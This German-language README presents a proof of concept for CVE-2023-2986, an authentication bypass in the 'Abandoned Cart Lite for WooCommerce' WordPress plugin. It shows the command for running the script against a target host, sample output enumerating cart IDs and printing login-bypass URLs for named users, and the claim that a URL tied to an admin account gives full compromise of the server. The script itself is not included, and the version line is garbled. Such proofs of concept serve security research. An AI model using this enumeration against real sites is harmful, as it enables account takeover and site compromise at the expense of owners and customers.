
Proof of Concept für die Schwachstelle CVE-2023-2986 im Plugin 'Abandoned Cart Lite for WooCommerce' für WordPress
Proof of Concept für die Schwachstelle CVE-2023-2986 im Plugin 'Abandoned Cart Lite for WooCommerce' in WordPress
version <= 5.14.2version <= 5.15.15.15.05.15.25.15.2sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5
Durch Eingabe der URL im Browser erhalten Sie Zugriff auf das jeweilige Benutzerkonto. Wenn der WordPress-Admin-Benutzer selbst einen Eintrag hat, führt dies zu Zugriff auf die Admin-Konsole und damit zur vollständigen Kompromittierung des WordPress-Servers.
Dieses Proof of Concept (POC) wurde ausschließlich für akademische Forschungszwecke und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich genehmigt wurde. Der Autor übernimmt keine Verantwortung oder Haftung für einen Missbrauch des POC. Verwenden Sie es verantwortungsbewusst.